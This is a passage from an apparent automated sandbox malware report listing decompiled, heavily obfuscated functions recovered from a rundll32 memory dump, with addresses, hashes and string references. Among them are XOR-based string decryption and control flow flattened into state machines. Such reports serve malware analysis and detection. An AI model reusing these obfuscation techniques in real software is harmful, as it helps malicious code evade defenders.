				_t317 = 0x4a;
				_v92 = _v92 * 0xa;
				_v92 = _v92 ^ 0x00082e5a;
				_v56 = 0x2010;
				_v56 = _v56 + 0x6ccb;
				_v56 = _v56 + 0x2189;
				_v56 = _v56 ^ 0x0000e7e1;
				_v52 = 0xe24c;
				_v52 = _v52 | 0xb0013f8b;
				_v52 = _v52 << 1;
				_v52 = _v52 ^ 0x6003e03d;
				_v24 = 0xcae4;
				_v24 = _v24 + 0xffff3be0;
				_v24 = _v24 | 0x53c4e224;
				_v24 = _v24 + 0xdb24;
				_v24 = _v24 ^ 0x53c5ec67;
				_v20 = 0xf2db;
				_v20 = _v20 | 0x9d3e6c9f;
				_v20 = _v20 + 0xfffff8fb;
				_v20 = _v20 ^ 0x9d3e8c3f;
				_v32 = 0x3a95;
				_v32 = _v32 / _t317;
				_v32 = _v32 ^ 0x6767bf24;
				_v32 = _v32 + 0xffff4a4a;
				_v32 = _v32 ^ 0x676704a1;
				_v100 = 0xcfed;
				_v100 = _v100 | 0x2d72ed6c;
				_v100 = _v100 ^ 0x2d72f6ca;
				_v28 = 0xc8bc;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x16f8c3dc;
				_t318 = 0x57;
				_v28 = _v28 / _t318;
				_v28 = _v28 ^ 0x0031469e;
				_v60 = 0x340f;
				_v60 = _v60 | 0x60076b77;
				_t286 = 0xf;
				_v60 = _v60 / _t286;
				_v60 = _v60 ^ 0x0666c1cd;
				_v12 = 0x65cb;
				_v12 = _v12 ^ 0xe13efb15;
				_v12 = _v12 | 0x07b0ec80;
				_v12 = _v12 + 0x1c32;
				_v12 = _v12 ^ 0xe7bf703c;
				_v80 = 0x385f;
				_v80 = _v80 | 0x3cde0f00;
				_v80 = _v80 ^ 0x3cde1c89;
				_v76 = 0x25c2;
				_v76 = _v76 | 0x354133f0;
				_v76 = _v76 ^ 0x354173d5;
				_v36 = 0xf130;
				_t319 = 0x31;
				_v36 = _v36 / _t319;
				_v36 = _v36 | 0x26022d3f;
				_v36 = _v36 ^ 0x260259a0;
				_v44 = 0x23a5;
				_v44 = _v44 + 0xffffbf3a;
				_t320 = 9;
				_v44 = _v44 / _t320;
				_v44 = _v44 ^ 0x1c71fd7f;
				_v88 = 0x959c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x00482fe1;
				_v40 = 0x5984;
				_v40 = _v40 * 0x53;
				_v40 = _v40 * 0x36;
				_v40 = _v40 ^ 0x061f671a;
				_v84 = 0xe20d;
				_v84 = _v84 + 0x3eb0;
				_v84 = _v84 ^ 0x00016653;
				_v108 = 0x2082;
				_t261 = _v108;
				_t309 = _t261 % _t286;
				_v108 = _t261 / _t286;
				_v108 = _v108 ^ 0x000021f9;
				_v68 = 0x2794;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x09e5240e;
				_v104 = 0x93a8;
				_v104 = _v104 | 0xc181dc9f;
				_v104 = _v104 ^ 0xc181b50b;
				_v64 = 0xb9de;
				_v64 = _v64 + 0xf455;
				_v64 = _v64 + 0xffff4ca8;
				_v64 = _v64 ^ 0x0000e0bb;
				do {
					while(_t289 != 0xe1884b8) {
						if(_t289 == 0xe2d4511) {
							_push(3);
							_t293 = 8;
							_t322 = E002A8E0A(_t293, _t309, __eflags);
							_t309 = _t322;
							E002911B2(_t322, 1, _v88, _t312, _v40, _v84,  &_v112);
							_t323 = _t323 - 0xc + 0x28;
							_t315 = _t312 + _t322 * 2;
							_t289 = 0x12da19a6;
							_t280 = 0x2e;
							 *_t315 = _t280;
							_t312 = _t315 + 2;
							continue;
						}
						if(_t289 == 0x12da19a6) {
							_push( &_v112);
							_push(_v64);
							_push(_v104);
							_push(_t312);
							_push(_v68);
							_push(1);
							_t311 = 3;
							E002911B2(_t311);
							__eflags = 0;
							 *((short*)(_t312 + 6)) = 0;
							return 0;
						}
						if(_t289 != 0x23d7c174) {
							goto L8;
						}
						_t280 = E002A1214();
						_v112 = _t280;
						_t289 = 0xe1884b8;
					}
					_push(3);
					_t290 = 4;
					_t321 = E002A8E0A(_t290, _t309, __eflags);
					E002911B2(1, 2, _v52, _t312, _v24, _v20,  &_v112);
					_t313 = _t312 + 2;
					_t309 = _t321;
					E002911B2(_t321, 1, _v100, _t313, _v28, _v60,  &_v112);
					_t323 = _t323 - 0xc + 0x40;
					_t314 = _t313 + _t321 * 2;
					_t289 = 0xe2d4511;
					_t272 = 0x5c;
					 *_t314 = _t272;
					_t312 = _t314 + 2;
					__eflags = _t312;
					L8:
					__eflags = _t289 - 0x2cedda33;
				} while (__eflags != 0);
				return _t280;
			}

0x0029c3c8
0x0029c3ce
0x0029c3d2
0x0029c3d7
0x0029c3de
0x0029c3e8
0x0029c3ee
0x0029c3f5
0x0029c3fc
0x0029c403
0x0029c407
0x0029c40e
0x0029c415
0x0029c41c
0x0029c423
0x0029c42a
0x0029c431
0x0029c438
0x0029c43f
0x0029c446
0x0029c452
0x0029c457
0x0029c45c
0x0029c463
0x0029c46a
0x0029c46e
0x0029c475
0x0029c47c
0x0029c487
0x0029c48a
0x0029c48d
0x0029c494
0x0029c49b
0x0029c4a2
0x0029c4a9
0x0029c4b0
0x0029c4b7
0x0029c4be
0x0029c4c1
0x0029c4c8
0x0029c4cf
0x0029c4d6
0x0029c4dd
0x0029c4e4
0x0029c4eb
0x0029c4f2
0x0029c4f9
0x0029c500
0x0029c507
0x0029c515
0x0029c518
0x0029c51f
0x0029c526
0x0029c52d
0x0029c534
0x0029c53b
0x0029c542
0x0029c549
0x0029c54d
0x0029c557
0x0029c55a
0x0029c55d
0x0029c564
0x0029c56b
0x0029c579
0x0029c57e
0x0029c581
0x0029c588
0x0029c58f
0x0029c596
0x0029c59d
0x0029c5a4
0x0029c5ab
0x0029c5b2
0x0029c5b9
0x0029c5c0
0x0029c5c7
0x0029c5ce
0x0029c5d5
0x0029c5e1
0x0029c5e6
0x0029c5e9
0x0029c5f0
0x0029c5f7
0x0029c5fe
0x0029c60a
0x0029c60f
0x0029c612
0x0029c619
0x0029c624
0x0029c627
0x0029c62e
0x0029c639
0x0029c640
0x0029c643
0x0029c64a
0x0029c651
0x0029c658
0x0029c65f
0x0029c666
0x0029c669
0x0029c66d
0x0029c670
0x0029c677
0x0029c67e
0x0029c682
0x0029c686
0x0029c68d
0x0029c694
0x0029c69b
0x0029c6a2
0x0029c6a9
0x0029c6b0
0x0029c6b7
0x0029c6bf
0x0029c6bf
0x0029c6d1
0x0029c70f
0x0029c713
0x0029c719
0x0029c722
0x0029c72f
0x0029c734
0x0029c737
0x0029c73a
0x0029c741
0x0029c742
0x0029c745
0x00000000
0x0029c745
0x0029c6d9
0x0029c7c3
0x0029c7c4
0x0029c7c7
0x0029c7ca
0x0029c7cb
0x0029c7d1
0x0029c7d4
0x0029c7d5
0x0029c7dd
0x0029c7df
0x00000000
0x0029c7df
0x0029c6e5
0x00000000
0x00000000
0x0029c6f1
0x0029c6f6
0x0029c6f9
0x0029c6f9
0x0029c75c
0x0029c760
0x0029c766
0x0029c77d
0x0029c785
0x0029c78c
0x0029c799
0x0029c79e
0x0029c7a1
0x0029c7a4
0x0029c7ab
0x0029c7ac
0x0029c7af
0x0029c7af
0x0029c7b2
0x0029c7b2
0x0029c7b2
0x00000000

Strings

/H, xrefs: 0029C627
lr-, xrefs: 0029C534

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: lr-$/H
API String ID: 0-2965134374
Opcode ID: cf7078801032d38ed6606ef750d7945fe6c494f633a7eab751993cea05fb834d
Instruction ID: 0f32032f1cfc3373e5ca44ea807da1c24057887b05775034856c93eec8f2f8e7
Opcode Fuzzy Hash: cf7078801032d38ed6606ef750d7945fe6c494f633a7eab751993cea05fb834d
Instruction Fuzzy Hash: 3EC12272D00309EBDB18CFE5D98A9DEFBB5FB44314F208159E115BA2A0C7B81A5ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 0029792C, Relevance: 2.6, Strings: 2, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0029792C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t79;
				void* _t90;
				signed int _t95;
				signed int _t96;
				void* _t99;
				void* _t116;
				signed int* _t119;

				_push(_a12);
				_t115 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t79);
				_v56 = 0xdb3e;
				_t119 =  &(( &_v76)[5]);
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00007fbe;
				_t116 = 0;
				_v76 = 0xd73d;
				_t99 = 0xf7121a4;
				_t95 = 0x1b;
				_v76 = _v76 * 0xc;
				_v76 = _v76 / _t95;
				_t96 = 0x4f;
				_v76 = _v76 * 0x32;
				_v76 = _v76 ^ 0x001287b1;
				_v52 = 0xd015;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x000059da;
				_v72 = 0x3b8c;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 ^ 0x35f682ae;
				_v60 = 0x1c58;
				_v60 = _v60 / _t96;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00006e3c;
				_v48 = 0x11;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x000035a8;
				_v64 = 0xb960;
				_v64 = _v64 | 0xa416bc7b;
				_v64 = _v64 * 0x7c;
				_v64 = _v64 ^ 0x7b03b1f6;
				_v68 = 0x8846;
				_v68 = _v68 * 0x6b;
				_v68 = _v68 + 0xffffbf62;
				_v68 = _v68 ^ 0x0038927d;
				do {
					while(_t99 != 0xf7121a4) {
						if(_t99 == 0x280bf9cf) {
							_t90 = E00293545( &_v44, _v52, __eflags, _v72, _t115);
							_t119 =  &(_t119[2]);
							__eflags = _t90;
							if(__eflags != 0) {
								_t99 = 0x2c6a21f1;
								continue;
							}
						} else {
							if(_t99 == 0x2c6a21f1) {
								__eflags = E002A39A9( &_v44, _v60, _v48, _v64, _t115 + 8, _v68);
								_t116 =  !=  ? 1 : _t116;
							} else {
								if(_t99 != 0x2fbbf61e) {
									goto L9;
								} else {
									E002ACF95(_v56,  &_v44, _a12, _v76);
									_t99 = 0x280bf9cf;
									continue;
								}
							}
						}
						L12:
						return _t116;
					}
					_t99 = 0x2fbbf61e;
					L9:
					__eflags = _t99 - 0x20655de9;
				} while (__eflags != 0);
				goto L12;
			}

0x00297933
0x00297937
0x0029793b
0x0029793c
0x00297940
0x00297941
0x00297942
0x00297947
0x0029794f
0x00297952
0x00297959
0x00297961
0x00297963
0x0029796b
0x0029797c
0x0029797f
0x0029798b
0x00297994
0x00297995
0x00297999
0x002979a1
0x002979a9
0x002979ae
0x002979b6
0x002979be
0x002979c7
0x002979cb
0x002979d0
0x002979d8
0x002979eb
0x002979ef
0x002979f4
0x002979fc
0x00297a04
0x00297a09
0x00297a11
0x00297a19
0x00297a26
0x00297a2a
0x00297a32
0x00297a3f
0x00297a43
0x00297a4b
0x00297a53
0x00297a53
0x00297a61
0x00297a96
0x00297a9b
0x00297a9e
0x00297aa0
0x00297aa2
0x00000000
0x00297aa2
0x00297a63
0x00297a65
0x00297ad5
0x00297ad7
0x00297a67
0x00297a69
0x00000000
0x00297a6b
0x00297a7b
0x00297a82
0x00000000
0x00297a82
0x00297a69
0x00297a65
0x00297adb
0x00297ae3
0x00297ae3
0x00297aa6
0x00297aa8
0x00297aa8
0x00297aa8
0x00000000

Strings

]e , xrefs: 00297AA8
<n, xrefs: 002979F4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <n$]e
API String ID: 0-226634354
Opcode ID: c98ea3094f5c7f08945692b648fa61e25c1866a8403bf3291b8c0587a47b0b31
Instruction ID: 908656029322b30eb28e4111d71d19f20df68c2db78464fb95779653c3a612b5
Opcode Fuzzy Hash: c98ea3094f5c7f08945692b648fa61e25c1866a8403bf3291b8c0587a47b0b31
Instruction Fuzzy Hash: 654153711183029FDB08CE25D88981FBBE6FBC8758F104A1DF586A62A0D774CA59CF93

Uniqueness

Uniqueness Score: -1.00%

Function 002AA094, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E002AA094(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _t87;
				intOrPtr _t96;
				signed int _t104;
				intOrPtr _t112;
				void* _t114;

				_push(_a16);
				_t114 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x2af200);
				E0029E171(_t87);
				_v52 = 0x21c86b;
				_v48 = 0x76557e;
				_v44 = 0;
				_v24 = 0x63a6;
				_v24 = _v24 + 0xb97;
				_v24 = _v24 | 0x545973d7;
				_v24 = _v24 ^ 0x545949e3;
				_v32 = 0xfab7;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00002a21;
				_v20 = 0x47e1;
				_v20 = _v20 + 0xd8c4;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00000fc9;
				_v8 = 0xeb9b;
				_v8 = _v8 << 0xe;
				_v8 = _v8 * 7;
				_v8 = _v8 ^ 0x0984a14c;
				_v8 = _v8 ^ 0x95cbb920;
				_v36 = 0x7d6f;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x00007cc5;
				_v12 = 0x27be;
				_v12 = _v12 | 0x9a688f43;
				_v12 = _v12 + 0x4446;
				_v12 = _v12 + 0xffff0760;
				_v12 = _v12 ^ 0x9a678b49;
				_v28 = 0x2743;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 * 0x3c;
				_v28 = _v28 ^ 0x00002e4d;
				_v40 = 0x1588;
				_v40 = _v40 * 0x2f;
				_v40 = _v40 ^ 0x0003ac65;
				_v16 = 0x2581;
				_v16 = _v16 << 4;
				_v16 = _v16 + 0xb76;
				_v16 = _v16 ^ 0x8774b782;
				_v16 = _v16 ^ 0x8776cfce;
				_t96 = E002A9E2B(0x40);
				 *0x2af9d4 = _t96;
				if(_t96 == 0) {
					L7:
					return 0;
				}
				_t104 =  *(_t96 + 0x20);
				 *((intOrPtr*)(_t96 + 0x28)) = 0x2af200;
				 *((intOrPtr*)(_t96 + 8)) = 0x2af200;
				 *((intOrPtr*)(_t96 + 0x3c)) = 0;
				while( *((intOrPtr*)(0x2af200 + _t104 * 8)) != 0) {
					_t104 = _t104 + 1;
					 *(_t96 + 0x20) = _t104;
				}
				if(E002A68CB(_v36, _v12, _t114, _v28) == 0) {
					_t112 =  *0x2af9d4; // 0x0
					E0029EF80(_v40, _t112, _v16);
					goto L7;
				}
				return 1;
			}

0x002aa09d
0x002aa0a0
0x002aa0a7
0x002aa0aa
0x002aa0ad
0x002aa0b0
0x002aa0b1
0x002aa0b2
0x002aa0b7
0x002aa0c0
0x002aa0ca
0x002aa0cd
0x002aa0d4
0x002aa0db
0x002aa0e2
0x002aa0e9
0x002aa0f0
0x002aa0f4
0x002aa0fb
0x002aa102
0x002aa109
0x002aa10d
0x002aa114
0x002aa11b
0x002aa125
0x002aa128
0x002aa12f
0x002aa136
0x002aa13d
0x002aa141
0x002aa148
0x002aa14f
0x002aa156
0x002aa15d
0x002aa164
0x002aa16b
0x002aa172
0x002aa17a
0x002aa17d
0x002aa184
0x002aa18f
0x002aa192
0x002aa199
0x002aa1a0
0x002aa1a4
0x002aa1ab
0x002aa1b2
0x002aa1c5
0x002aa1cd
0x002aa1d4
0x002aa21d
0x00000000
0x002aa21d
0x002aa1d6
0x002aa1d9
0x002aa1dc
0x002aa1df
0x002aa1e8
0x002aa1e4
0x002aa1e5
0x002aa1e5
0x002aa204
0x002aa20e
0x002aa217
0x00000000
0x002aa21c
0x00000000

Strings

IYT, xrefs: 002AA0E2
~Uv, xrefs: 002AA0C0

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ~Uv$IYT
API String ID: 0-2158705046
Opcode ID: 4346badc2d000480ab549788fd08aaf5f55457212640939f06aff6202069efcb
Instruction ID: a50aed90aa3ec58004da92177739108d04840f942582a640d4d5ca1b29fb428f
Opcode Fuzzy Hash: 4346badc2d000480ab549788fd08aaf5f55457212640939f06aff6202069efcb
Instruction Fuzzy Hash: F74146B2C0020AEFDF05CFA5D94A8EEBBB0FF45304F208099D515B6260D7B95A54DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00293FAB, Relevance: 2.6, Strings: 2, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E00293FAB(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v560;
				intOrPtr* _t104;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;

				_v40 = 0;
				_v8 = 0x45dc;
				_v8 = _v8 + 0xffff762b;
				_v8 = _v8 + 0xfffff449;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07fffb7e;
				_v24 = 0x6954;
				_t108 = 0x53;
				_v24 = _v24 / _t108;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x00002f64;
				_v16 = 0x4ff7;
				_v16 = _v16 | 0x94d957a5;
				_v16 = _v16 ^ 0xc96e7ce7;
				_t109 = 0x28;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0257c227;
				_v20 = 0xa16;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x34afe4ef;
				_t110 = 0xa;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x0544a66f;
				_v28 = 0xd693;
				_v28 = _v28 | 0x4d95e164;
				_t111 = 0x45;
				_v28 = _v28 / _t111;
				_v28 = _v28 ^ 0x011f90f9;
				_v32 = 0xd860;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x004c03db;
				_v12 = 0x599b;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xffffa0b4;
				_v12 = _v12 | 0xe0a08773;
				_v12 = _v12 ^ 0xe0aabedc;
				_v36 = 0x7b48;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x01ed05da;
				_t112 = _v8;
				if(E002A38D1(_t112,  &_v560, _v24, _t111, _v16) != 0) {
					_t104 =  &_v560;
					if(_v560 != 0) {
						while( *_t104 != 0x5c) {
							_t104 = _t104 + 2;
							if( *_t104 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t104 + 2)) = 0;
					}
					L6:
					_push(_t112);
					_push(_v36);
					_push(_v12);
					_push(_v32);
					_push( &_v560);
					_push(_v28);
					_push( &_v40);
					_push(_t112);
					E002A97E2(_t112, _v20);
				}
				return _v40;
			}

0x00293fb9
0x00293fbc
0x00293fc3
0x00293fca
0x00293fd1
0x00293fd5
0x00293fdc
0x00293fe8
0x00293fed
0x00293ff2
0x00293ff6
0x00293ffd
0x00294004
0x0029400b
0x00294015
0x0029401a
0x0029401f
0x00294026
0x0029402d
0x00294031
0x0029403b
0x00294040
0x00294045
0x0029404c
0x00294053
0x0029405d
0x00294066
0x00294069
0x00294070
0x0029407b
0x0029407e
0x00294085
0x0029408c
0x00294090
0x00294097
0x0029409e
0x002940a5
0x002940ac
0x002940b0
0x002940be
0x002940cb
0x002940cd
0x002940da
0x002940dc
0x002940e2
0x002940e8
0x00000000
0x00000000
0x002940ea
0x00000000
0x002940e8
0x002940ec
0x002940ee
0x002940ee
0x002940f2
0x002940f2
0x002940f3
0x002940fc
0x002940ff
0x00294105
0x00294106
0x0029410f
0x00294110
0x00294111
0x00294116
0x00294120

Strings

d/, xrefs: 00293FF6
H{, xrefs: 002940A5

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H{$d/
API String ID: 0-2275131086
Opcode ID: 36fbb4c2a2ae0c68f8c6c4e1a418c6157839b98d6d02cc2e246d424671e84a19
Instruction ID: 99b249a7be23cfa6d0cf8f61da3089132f59d58aab645e61b7f7bc3043e84a5c
Opcode Fuzzy Hash: 36fbb4c2a2ae0c68f8c6c4e1a418c6157839b98d6d02cc2e246d424671e84a19
Instruction Fuzzy Hash: 4B411172D0020EEBDF18DFE1D94A9EEBBB1FB04304F2080A9D515B6290E7B55A59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00296ABA, Relevance: 2.6, Strings: 2, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00296ABA(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t53;
				signed int _t58;
				short* _t77;
				signed int _t78;
				signed int _t80;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t87;
				short* _t90;
				signed int* _t91;
				signed int* _t92;
				unsigned int _t94;
				void* _t100;
				short _t102;
				void* _t104;
				void* _t106;

				_push( *(_t104 + 0x2c));
				_push( *(_t104 + 0x2c));
				_push(__edx);
				E0029E171(_t53);
				 *(_t104 + 0x24) = 0xa1e0;
				_t91 =  &(__edx[1]);
				 *(_t104 + 0x24) =  *(_t104 + 0x24) >> 6;
				 *(_t104 + 0x24) =  *(_t104 + 0x24) + 0x6484;
				 *(_t104 + 0x24) =  *(_t104 + 0x24) ^ 0x00004c34;
				 *(_t104 + 0x1c) = 0xe5ad;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) * 0xb;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) << 0xb;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) | 0x1f75fa72;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) ^ 0x5ff7909c;
				 *(_t104 + 0x28) = 0xe962;
				 *(_t104 + 0x28) =  *(_t104 + 0x28) * 0x51;
				 *(_t104 + 0x28) =  *(_t104 + 0x28) ^ 0x004993fd;
				 *(_t104 + 0x20) = 0xd249;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) >> 0xa;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) >> 1;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) ^ 0x000031d0;
				_t80 =  *__edx;
				_t92 =  &(_t91[1]);
				_t58 =  *_t91 ^ _t80;
				 *(_t104 + 0x2c) = _t80;
				 *(_t104 + 0x30) = _t58;
				_t94 =  !=  ? (_t58 + 0x00000001 & 0xfffffffc) + 4 : _t58 + 1;
				_t77 = E002A9E2B(_t94 + _t94);
				_t106 = _t104 + 0x14;
				 *((intOrPtr*)(_t106 + 0x18)) = _t77;
				if(_t77 != 0) {
					_t102 = 0;
					_t90 = _t77;
					_t100 =  >  ? 0 :  &(_t92[_t94 >> 2]) - _t92 + 3 >> 2;
					if(_t100 != 0) {
						_t78 =  *(_t106 + 0x20);
						do {
							_t85 =  *_t92;
							_t92 =  &(_t92[1]);
							_t86 = _t85 ^ _t78;
							 *_t90 = _t86 & 0x000000ff;
							_t90 = _t90 + 8;
							 *((short*)(_t90 - 6)) = _t86 >> 0x00000008 & 0x000000ff;
							_t87 = _t86 >> 0x10;
							_t102 = _t102 + 1;
							 *((short*)(_t90 - 4)) = _t87 & 0x000000ff;
							 *((short*)(_t90 - 2)) = _t87 >> 0x00000008 & 0x000000ff;
						} while (_t102 < _t100);
						_t77 =  *((intOrPtr*)(_t106 + 0x1c));
					}
					 *((short*)(_t77 +  *(_t106 + 0x24) * 2)) = 0;
				}
				return _t77;
			}

0x00296ac0
0x00296ac4
0x00296ac8
0x00296aca
0x00296acf
0x00296ad7
0x00296ada
0x00296adf
0x00296ae7
0x00296aef
0x00296afc
0x00296b00
0x00296b05
0x00296b0d
0x00296b15
0x00296b22
0x00296b26
0x00296b2e
0x00296b36
0x00296b3b
0x00296b3f
0x00296b47
0x00296b4b
0x00296b4e
0x00296b50
0x00296b54
0x00296b68
0x00296b87
0x00296b89
0x00296b8c
0x00296b92
0x00296b9a
0x00296b9c
0x00296bad
0x00296bb2
0x00296bb4
0x00296bb8
0x00296bb8
0x00296bba
0x00296bbd
0x00296bc2
0x00296bca
0x00296bd0
0x00296bd4
0x00296bdd
0x00296bde
0x00296be5
0x00296be9
0x00296bed
0x00296bed
0x00296bf8
0x00296bf8
0x00296c04

Strings

4L, xrefs: 00296AE7
b, xrefs: 00296B15

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4L$b
API String ID: 0-1753729215
Opcode ID: 0855ad7a77b50e6f2128261b9b8c38188ac769a4ef93ece512a336bbd456b227
Instruction ID: 348e187cbfea2d27e406200590cdd8b89bc5f90b7966ad8c694792fefe81c826
Opcode Fuzzy Hash: 0855ad7a77b50e6f2128261b9b8c38188ac769a4ef93ece512a336bbd456b227
Instruction Fuzzy Hash: 644158726183128FD704DF29C48585AFBE0FF88718F414A2EE899A7250D774EA49CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0029EF80, Relevance: 2.6, Strings: 2, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E0029EF80(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t76;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t107;

				_push(_a4);
				_t107 = __edx;
				_push(__edx);
				_push(__ecx);
				E0029E171(_t76);
				_v32 = 0x4e91b6;
				asm("stosd");
				_t92 = 0x47;
				asm("stosd");
				asm("stosd");
				_v16 = 0x6775;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000a54;
				_v12 = 0x2e88;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 | 0xc6e1cf8f;
				_v12 = _v12 / _t92;
				_v12 = _v12 ^ 0x02cd60f0;
				_v12 = 0x9f5d;
				_t93 = 0x38;
				_v12 = _v12 / _t93;
				_v12 = _v12 + 0xffff4f0e;
				_v12 = _v12 ^ 0xffff29d2;
				_v12 = 0xccb;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0xec83dd18;
				_v12 = _v12 ^ 0xec83c459;
				_v12 = 0x5097;
				_v12 = _v12 ^ 0x4b44d7e3;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x43ba3a84;
				_v12 = 0x40e2;
				_t94 = 0x3f;
				_v12 = _v12 / _t94;
				_t95 = 0x6d;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 / _t95;
				_v12 = _v12 ^ 0x000039be;
				_v8 = 0xf076;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 | 0x8ee36b54;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x08ee5ca2;
				return E002A4A7E(_v12, _v8, E002A0AD4(), _t107);
			}

0x0029ef88
0x0029ef8b
0x0029ef8d
0x0029ef8e
0x0029ef8f
0x0029ef94
0x0029efa2
0x0029efa5
0x0029efa8
0x0029efa9
0x0029efaa
0x0029efb1
0x0029efb5
0x0029efbc
0x0029efc3
0x0029efc7
0x0029efd5
0x0029efd8
0x0029efdf
0x0029efe9
0x0029efee
0x0029eff3
0x0029effa
0x0029f001
0x0029f008
0x0029f00c
0x0029f013
0x0029f01a
0x0029f021
0x0029f028
0x0029f02c
0x0029f033
0x0029f03d
0x0029f042
0x0029f04b
0x0029f04c
0x0029f054
0x0029f057
0x0029f05e
0x0029f065
0x0029f069
0x0029f070
0x0029f074
0x0029f098

Strings

@, xrefs: 0029F033
T, xrefs: 0029EFB5

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

